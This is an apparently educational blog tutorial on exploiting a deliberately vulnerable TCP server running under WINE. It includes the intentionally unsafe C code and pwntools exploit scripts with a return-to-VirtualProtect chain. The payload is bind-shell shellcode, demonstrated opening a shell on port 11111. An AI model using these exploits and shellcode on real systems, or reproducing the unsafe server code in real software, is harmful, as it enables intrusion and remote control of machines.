
Attacking applications running under WINE (Part II)

May 20, 2019

Simple exploits against targets under WINE

In this part of the series, I will demonstrate some simple exploits against Windows executables running under WINE. I will assume basic knowledge of exploiting stack overflows on the x86 architecture. Additionally, some knowledge of return-oriented programming (ROP) or return-to-libc exploitation techniques is beneficial. For convenience I’m using pwntools to develop the exploits, but any other toolkit will work as well. Also, I’m showing some rather simple tasks in some detail to demonstrate the use of Linux tools against Windows binaries.

None of the techniques in this text are spectacularly new; in fact, most have been publicly known for over a decade. The purpose of this part is to demonstrate how these tricks can be applied against applications running in WINE.

If you are already familiar with basic stack-based buffer overflows under Windows, your TL;DR of this text is: attacking a WINE application feels a lot like attacking a target running on Windows XP SP2: with DEP, but without effective ASLR. Many old buffer overflow tricks work as expected, and you can use Linux tools for the exploit development. Also, Linux shellcodes can be used (which are normally a lot smaller than comparable Windows payloads).

Software versions used

wine-3.0.3 (Ubuntu 3.0.3-2)
Visual Studio 2012
GDB (8.2)/gef

All tests were done on an Ubuntu 18.10 x86_64 system.

The target

For this demonstration I wrote a simple TCP server program with an easy-to-abuse stack-based buffer overflow.

The code:

#include "stdafx.h"

void WIN(void);

void handle_connection(int s)
{
	char buffer2[128];						// [1]

	send(s,"What's your name?\r\n",sizeof("What's your name?\r\n"),0);
	int l = recv(s,buffer2,512,0);					// [2]
	printf("recv %d\n",l);

	send(s,buffer2,strlen(buffer2),0);

	closesocket(s);
}

int _tmain(int argc, _TCHAR* argv[])
{
	WSADATA wsaData;
	int iResult;

	if (argc > 1)
	{
		printf("WIN at %p\n",WIN);
		printf("Stack at %p\n",&iResult);
	}

	// Initialize Winsock
	iResult = WSAStartup(MAKEWORD(2,2), &wsaData);
	if (iResult != 0) {
		printf("WSAStartup failed: %d\n", iResult);
		return 1;
	}

	int s = socket(AF_INET,SOCK_STREAM,0);				// [3]

	struct sockaddr_in sa;
	sa.sin_addr.S_un.S_addr	= INADDR_ANY;
	sa.sin_family = AF_INET;
	sa.sin_port = htons(31337);

	bind(s,(struct sockaddr*)&sa,sizeof(struct sockaddr_in));
	listen(s,3);

	while(1)
	{
		struct sockaddr_in ca;
		int addrlen = sizeof(struct sockaddr_in);
		int c = accept(s,(struct sockaddr*)&ca,&addrlen);

		handle_connection(c);					// [4]
	}
	return 0;
}

void WIN(void)								// [5]
{
	printf("#########################\r\n");
	printf("###   You have won!   ###\r\n");
	printf("#########################\r\n");

	ExitProcess(1);
}

A TCP socket listening on port 31337 is created in the program’s main function, beginning at [3]. Every incoming connection is handled by the handle_connection function, called at [4]. This is where the buffer overflow happens: at [2], up to 512 bytes are received into the buffer declared at [1], but this buffer is only 128 bytes long. So, if more than 128 bytes are sent to the server, the additional bytes are written past the end of the buffer, overwriting the saved frame pointer, the return address and whatever else is in the way.

The program also contains a function named WIN which is not called from anywhere in the code. This will be our first target, before we proceed to arbitrary code execution.

To keep exploitation simple, we compile the code to 32 bit without stack protection (/GS-).

You can find the Visual Studio project and compiled binary here. It can be run via wine simple_server_target.exe

Calling the WIN-function

The first goal is to reach the WIN function already present in the binary. We will achieve this by simply overwriting the saved return address (like it’s 1996).

First, run the program in wine (wine simple_server_target.exe), attach gdb (gdb -p $(pidof simple_server_target.exe)) and let it continue. Under Ubuntu, you might have to disable the ptrace_scope restriction first (echo 0 > /proc/sys/kernel/yama/ptrace_scope as root).

Next, send a cyclic pattern to overflow the buffer and overwrite EIP. This is a quick and reliable method to find out exactly which of the bytes we send to the target end up overwriting the saved instruction pointer.

from pwn import *
  
exploitstr = cyclic(512)

c = connect("127.0.0.1",31337)
c.send(exploitstr)

As expected, the target crashes upon receiving the overlong input:

Program received signal SIGSEGV, Segmentation fault.
0x6261616e in ?? ()
[ Legend: Modified register | Code | Heap | Stack | String ]
──────────────────────────────────────────────────────────── registers ────
$eax   : 0xffffffff
$ebx   : 0x0       
$ecx   : 0x0033fc1c  →  "oaabaaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaala[...]"
$edx   : 0x0       
$esp   : 0x0033fcbc  →  "oaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacba[...]"
$ebp   : 0x6261616d ("maab"?)
$esi   : 0x1       
$edi   : 0x0       
$eip   : 0x6261616e ("naab"?)
$eflags: [ZERO carry PARITY adjust sign trap INTERRUPT direction overflow RESUME virtualx86 identification]
$cs: 0x0023 $ss: 0x002b $ds: 0x002b $es: 0x002b $fs: 0x006b $gs: 0x0063 
──────────────────────────────────────────────────────────────── stack ────
0x0033fcbc│+0x0000: "oaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacba[...]"	 ← $esp
0x0033fcc0│+0x0004: "paabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaacca[...]"
0x0033fcc4│+0x0008: "qaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacda[...]"
0x0033fcc8│+0x000c: "raabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaacea[...]"
0x0033fccc│+0x0010: "saabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfa[...]"
0x0033fcd0│+0x0014: "taabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacga[...]"
0x0033fcd4│+0x0018: "uaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaacha[...]"
0x0033fcd8│+0x001c: "vaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaacia[...]"
────────────────────────────────────────────────────────── code:x86:32 ────
[!] Cannot disassemble from $PC
[!] Cannot access memory at address 0x6261616e
──────────────────────────────────────────────────────────────── trace ────
───────────────────────────────────────────────────────────────────────────
gef➤

It’s easy to see the saved EIP got overwritten with 0x6261616e, and the program segfaults when returning because there is no code at this address.

So, at which position in the constructed exploitstr are these bytes?

In [1]: from pwn import *

In [2]: cyclic_find(0x6261616e)
Out[2]: 152

The values that end up overwriting the EIP are 152 bytes into the buffer.
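
For readers without pwntools at hand, the lookup can be reproduced with the standard library alone. The following is only a sketch: it assumes the pattern is a de Bruijn sequence over the lowercase alphabet with 4-byte subsequences (which matches the bytes visible in the gdb output above), and the names pattern and find_offset are made up for this illustration and are not part of pwntools.

```python
import struct
from itertools import islice
from string import ascii_lowercase


def de_bruijn(alphabet, n):
    """Yield a de Bruijn sequence over `alphabet` in which every
    n-symbol window occurs exactly once."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t, p):
        if t > n:
            if n % p == 0:
                for j in range(1, p + 1):
                    yield alphabet[a[j]]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    return db(1, 1)


def pattern(length, n=4):
    """First `length` bytes of the cyclic pattern."""
    return "".join(islice(de_bruijn(ascii_lowercase, n), length)).encode("ascii")


def find_offset(value, length=512):
    """Offset of a 32-bit register value inside the pattern, or -1."""
    needle = struct.pack("<I", value)  # registers hold the bytes little-endian
    return pattern(length).find(needle)


offset = find_offset(0x6261616e)  # the EIP value from the crash
print(offset)
```

Because every 4-byte window of the pattern is unique, a single register value is enough to recover the offset.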

From here, building the WIN-exploit is quite straightforward: we need to send 152 bytes of data (it will be ignored and serves just as filler), followed by the address of WIN (in the correct byte order).

The address of WIN itself can easily be found using any advanced disassembler like IDA or Ghidra, either by following the references to the “you have won” string or just by looking at the function immediately following main. In the provided binary it’s 0x00401190 (as pointed out in Part I, there is no address space layout randomisation, so this address does not change between runs).
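
To make "the correct byte order" concrete: x86 is little-endian, so the least significant byte of the address goes first. A small sketch using the standard struct module in place of pwntools' p32 (both produce a little-endian 32-bit value by default):

```python
import struct

WIN_ptr = 0x00401190

# "<I" = little-endian unsigned 32-bit integer
packed = struct.pack("<I", WIN_ptr)

# 152 filler bytes, then the new return address
payload = b"A" * 152 + packed

print(packed.hex())   # 90114000
print(len(payload))   # 156
```

The payload is 156 bytes long, which is the number of bytes the target should report as received.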

So, the final exploit is:

from pwn import *
  
WIN_ptr = 0x00401190

exploitstr = b"A"*152 + p32(WIN_ptr)

c = connect("127.0.0.1",31337)
c.send(exploitstr)

To which the target responds with:

$ wine simple_server_target.exe 2>/dev/null
recv 156
#########################
###   You have won!   ###
#########################

Against a 64-bit target the exploit looks only slightly different: the saved RIP sits at a different location and the WIN function has a different address.

Arbitrary code execution

So far, we have just executed code that was already part of the target binary. As the next step, we will ignore the WIN function and get our own shellcode executed.

The ‘old school’ way to do this is to place the shellcode (plus some NOPs) on the stack as part of the data overflowing the buffer and overwrite the saved EIP with the buffer’s address. Once handle_connection finishes, it returns to the buffer on the stack and the shellcode gets executed.

Finding the address of the buffer is easy: Place a breakpoint on the ret of handle_connection (0x0040109A) and send the program some data (for example the exploit from the last section).

Breakpoint 1, 0x0040109a in ?? ()
[ Legend: Modified register | Code | Heap | Stack | String ]
──────────────────────────────────────────────────────────── registers ────
$eax   : 0x0       
$ebx   : 0x0       
$ecx   : 0x0033fc1c  →  0x00000028 ("("?)
$edx   : 0x0       
$esp   : 0x0033fcb8  →  0x00401190  →  0x68ec8b55
$ebp   : 0x41414141 ("AAAA"?)
$esi   : 0x1       
$edi   : 0x0       
$eip   : 0x0040109a  →  0xccccccc3  →  0x00000000
$eflags: [ZERO carry PARITY adjust sign trap INTERRUPT direction overflow resume virtualx86 identification]
$cs: 0x0023 $ss: 0x002b $ds: 0x002b $es: 0x002b $fs: 0x006b $gs: 0x0063 

[...]

When the breakpoint gets hit, look at the current value of ESP (0x0033fcb8); that’s where the saved instruction pointer resides. As detailed in the last section, the buffer starts 152 bytes below the saved EIP, so it’s located at 0x33fc20. And again: there is no ASLR, so all these addresses are constant (for a given binary).
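
The address arithmetic, spelled out as a quick check (the variable names are only for illustration; the values are the ones from the gdb session above and may differ on your system):

```python
saved_eip_addr = 0x0033fcb8   # ESP at the ret breakpoint
eip_offset     = 152          # result of cyclic_find

# The buffer starts eip_offset bytes below the saved return address.
buffer_addr = saved_eip_addr - eip_offset

print(hex(buffer_addr))  # 0x33fc20
```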

But there is another problem: the stack is not executable.

gef➤  vmmap 
Start      End        Offset     Perm Path
[...]
0x00242000 0x00340000 0x00000000 rw- 
[...]

As long as this is the case, we can still return to our shellcode, but all we get is an exception (for trying to execute code in non-executable memory). A somewhat classical way around this is to call VirtualProtect to make the stack executable before executing the shellcode. Calling VirtualProtect while the stack is still non-executable can be achieved using return-oriented programming (ROP). Here we will use a simple predecessor (or subset) of ROP often referred to as return-to-libc (or here: return-to-kernel32.dll.so).

I will not dive deep into the general concepts of this technique as there are many good texts available.

But in short: In Win32, all parameters are passed via the stack - which we control. If we overwrite the return address with the address of VirtualProtect, followed by the parameters we want to pass to the function, at the end of handle_connection the target will ‘return’ to the start of VirtualProtect. And, conveniently, all the parameters VirtualProtect reads from the stack will be controlled by us. We can therefore instruct the function to make the memory where our shellcode resides executable. Additionally, we control what VirtualProtect considers its return address. If we set this value to the address of our shellcode, VirtualProtect will ‘return’ to the (now executable) shellcode - and we have won.

A side note: I assume here that the exact address of VirtualProtect is known to the attacker. This is trivial if the library as used by the target is on hand:

$ readelf -s kernel32.dll.so|grep VirtualProtect
   370: 7b480940   184 FUNC    GLOBAL DEFAULT   12 VirtualProtectEx
   532: 7b480a00    61 FUNC    GLOBAL DEFAULT   12 VirtualProtect

If the exact library version is unknown, this becomes a much harder problem. But as I concentrate on CTF-style settings in these texts, I will assume that the kernel32.dll.so file used on the target system is known and available.
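
If you want to pull the address into a script instead of copying it by hand, the readelf output can be parsed with a few lines of Python. This is a rough sketch: symbol_address is a hypothetical helper, and the sample text is simply the two lines shown above. Note that the name has to match exactly, otherwise VirtualProtectEx would be picked up first.

```python
READELF_OUTPUT = """\
   370: 7b480940   184 FUNC    GLOBAL DEFAULT   12 VirtualProtectEx
   532: 7b480a00    61 FUNC    GLOBAL DEFAULT   12 VirtualProtect
"""


def symbol_address(readelf_output, name):
    """Return the value of the symbol called exactly `name`, or None."""
    for line in readelf_output.splitlines():
        fields = line.split()
        # Expected columns: Num: Value Size Type Bind Vis Ndx Name
        if len(fields) >= 8 and fields[-1].split("@")[0] == name:
            return int(fields[1], 16)
    return None


VirtualProtect_ptr = symbol_address(READELF_OUTPUT, "VirtualProtect")
print(hex(VirtualProtect_ptr))  # 0x7b480a00
```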

To implement the attack as described, we must assemble the stack from the following building blocks (all 32bit/uint32_t values from the stack pointer in ascending order):

Address of VirtualProtect

The original return address is overwritten with the address of VirtualProtect. When handle_connection returns, it pops this address from the stack and jumps there - right at the beginning of VirtualProtect. As pointed out before, you can get the address of VirtualProtect from kernel32.dll.so.

Address of shellcode

VirtualProtect expects to be called ‘the normal way’, via a call instruction, which pushes the return address onto the stack. This does not happen here because we jump to it via a ret, not a call. But we can place the address of the shellcode here - at the position where under normal conditions the return address would have been. Once VirtualProtect is done, it will pop this address off the stack and return to it, thereby executing the shellcode.

lpAddress: Memory page of the shellcode

In a normal call (in 32-bit Windows), the function parameters are pushed onto the stack directly before the call instruction. So this value will be seen by VirtualProtect as its first parameter, lpAddress. This is the address of the memory page whose permissions will be changed (it must be the start address of a memory page, otherwise the call will fail). We will use the start address of the memory page the buffer (and therefore the shellcode) is located in. And as there is no address space layout randomisation, we can simply look that address up in gdb.

dwSize: size of the region to change

The second parameter for VirtualProtect is the size of the region to change. We will use 4096, as our shellcode should fit in one page.

flNewProtect: PAGE_EXECUTE_READWRITE

Third parameter for VirtualProtect: a constant describing the new protection mode (see here for details). The best choice for us is 0x40 (PAGE_EXECUTE_READWRITE).

lpflOldProtect: a writable address below the shellcode

The last parameter to VirtualProtect is a memory address that receives the old protection mode. We are not really interested in that value, but since the parameter is not optional, we have to supply some writable address. Any location inside the buffer is as good as any other place we know we have write permission for; the exploit below uses an address 100 bytes below the shellcode.
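
To see why this layout works, the ret at the end of handle_connection can be simulated on paper, or in a few lines of Python. The sketch below uses the addresses from this article (yours may differ); the helper dword_at and the dictionary callee_view are purely illustrative.

```python
import struct

VirtualProtect_ptr = 0x7b480a00
shellcode_ptr      = 0x0033fcd0
saved_eip_addr     = 0x0033fcb8   # stack address of the overwritten return address

chain = [
    VirtualProtect_ptr,            # consumed by handle_connection's ret
    shellcode_ptr,                 # what VirtualProtect takes as its return address
    shellcode_ptr & 0xfffff000,    # lpAddress
    4096,                          # dwSize
    0x40,                          # flNewProtect (PAGE_EXECUTE_READWRITE)
    shellcode_ptr - 100,           # lpflOldProtect (value used by the exploit script)
]
raw = struct.pack("<6I", *chain)


def dword_at(addr):
    """Read a 32-bit value from our fake stack at an absolute address."""
    return struct.unpack_from("<I", raw, addr - saved_eip_addr)[0]


# ret: pop one dword into EIP, ESP moves up by 4
eip = dword_at(saved_eip_addr)
esp = saved_eip_addr + 4

# On function entry, [esp] is the return address and the
# parameters follow at [esp+4], [esp+8], ...
callee_view = {
    "return address": dword_at(esp),
    "lpAddress":      dword_at(esp + 4),
    "dwSize":         dword_at(esp + 8),
    "flNewProtect":   dword_at(esp + 12),
    "lpflOldProtect": dword_at(esp + 16),
}

print(hex(eip))
for name, value in callee_view.items():
    print(name, hex(value))
```

From the point of view of VirtualProtect, this is indistinguishable from a regular call made by code located just before the shellcode.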

Since VirtualProtect will create its own local variables on the stack, the area below the saved EIP is a bad place to store the shellcode: it would probably get overwritten by VirtualProtect’s local variables. Luckily, we can write 512 bytes with the overflowing recv call; with the return address 152 bytes into the buffer and the 24 bytes needed for the two new return addresses plus the four parameters for VirtualProtect, this still leaves us with more than enough space behind the parameters to hold a shellcode and some NOPs.
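
A quick back-of-the-envelope check of the space budget and of where the shellcode ends up. The constant names are invented for this sketch; the numbers come from the text and the gdb session, and the 73-byte shellcode plus 4 NOPs is an assumption about the payload size.

```python
RECV_LIMIT     = 512         # recv() copies at most this many bytes
EIP_OFFSET     = 152         # filler before the saved return address
CHAIN_SIZE     = 6 * 4       # two addresses + four parameters, 4 bytes each
NOPS           = 4
SHELLCODE_LEN  = 73
saved_eip_addr = 0x0033fcb8  # from the ret breakpoint

space_left = RECV_LIMIT - EIP_OFFSET - CHAIN_SIZE
landing    = saved_eip_addr + CHAIN_SIZE   # first byte after the parameters
page_start = landing & ~0xfff              # start of the page containing it
page_end   = page_start + 4096

print(space_left)        # 336
print(hex(landing))      # 0x33fcd0
print(hex(page_start))   # 0x33f000

# The payload fits into the remaining bytes and does not cross the page end.
assert NOPS + SHELLCODE_LEN <= space_left
assert landing + NOPS + SHELLCODE_LEN <= page_end
```

So a single 4096-byte page starting at 0x33f000 covers the whole payload, which is why one page is enough for dwSize.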

As shellcode I use the Tiny Shell Bind TCP Shellcode by Geyslan G. Bem, a very small (73 bytes) Linux shellcode that binds a shell to TCP port 11111. We could have used a Windows shellcode instead, but there is no real reason to do so: Linux shellcodes are of simpler design, much smaller and work fine in a WINE environment.

So the final buffer we send to the target looks like this:

[A*152][address of VirtualProtect][address of shellcode][lpAddress][dwSize][flNewProtect][lpflOldProtect][some NOPs][shellcode]

And that’s it. Once the ret of handle_connection is executed, it ‘returns’ to the saved return address from the stack - which got overwritten with the address of VirtualProtect. For VirtualProtect there is no difference to being invoked normally by a call instruction: It takes the four parameters from the stack and does its work, setting the buffer’s memory page to executable. Upon return, VirtualProtect will take from the stack what it considers the return address pushed at its own invocation - which is the shellcode’s address placed by us. So execution returns to the (now executable) shellcode - and we have won.

The code:

from pwn import *

# 836   Linux/x86   Tiny Shell Bind TCP - 73 bytes
# Written in 2013 by Geyslan G. Bem, Hacking bits
# http://shell-storm.org/shellcode/files/shellcode-836.php
# Opens tcp shell at port 11111
shellcode = b""
shellcode += b"\x31\xdb\xf7\xe3\xb0\x66\x43\x52\x53\x6a"
shellcode += b"\x02\x89\xe1\xcd\x80\x5b\x5e\x52\x66\x68"
shellcode += b"\x2b\x67\x6a\x10\x51\x50\xb0\x66\x89\xe1"
shellcode += b"\xcd\x80\x89\x51\x04\xb0\x66\xb3\x04\xcd"
shellcode += b"\x80\xb0\x66\x43\xcd\x80\x59\x93\x6a\x3f"
shellcode += b"\x58\xcd\x80\x49\x79\xf8\xb0\x0b\x68\x2f"
shellcode += b"\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3"
shellcode += b"\x41\xcd\x80"

# might need some adjustment depending on your system
shellcode_ptr = 0x33fcd0

# Address via readelf -s /usr/lib/i386-linux-gnu/wine/kernel32.dll.so |grep VirtualProtect
# Update it if your kernel32.dll.so is different
VirtualProtect_ptr = 0x7b480a00

# parameters to VirtualProtect
lpAddress       = shellcode_ptr & 0xfffff000    # start of the page holding the shellcode
dwSize          = 4096                          # should cover our shellcode
flNewProtect    = 0x40                          # PAGE_EXECUTE_READWRITE
lpflOldProtect  = shellcode_ptr-100             # some writable address

# byte strings, so the script runs under both Python 2 and Python 3
exploitstr = b"A"*152

# offset in exploitstr 152
# ROP-call to VirtualProtect
exploitstr += p32(VirtualProtect_ptr)

exploitstr += p32(shellcode_ptr)     # return to shellcode
# params to VirtualProtect
exploitstr += p32(lpAddress)
exploitstr += p32(dwSize)
exploitstr += p32(flNewProtect)
exploitstr += p32(lpflOldProtect)

exploitstr += b"\x90"*4+shellcode

c = connect("127.0.0.1",31337)
c.send(exploitstr)

Testing the exploit

Run wine simple_server_target.exe in one terminal, and test the exploit in another:

$ python text_2_exploit_shellcode.py 
[+] Opening connection to 127.0.0.1 on port 31337: Done
[*] Closed connection to 127.0.0.1 port 31337
$ nc -v 127.0.0.1 11111
Connection to 127.0.0.1 11111 port [tcp/*] succeeded!
uname -a
Linux testsystem 4.18.0-18-generic #19-Ubuntu SMP Tue Apr 2 18:13:16 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
^C

Where do we go from here

So far, there was nothing here beyond standard Windows exploitation (from the good old days of Windows XP SP2). But in the next part of this series I will demonstrate a new, WINE-specific trick:

There is a much more elegant way to make the stack (and many other things) executable than the return-to-VirtualProtect used here: The VIRTUAL_SetForceExec ROP gadget.
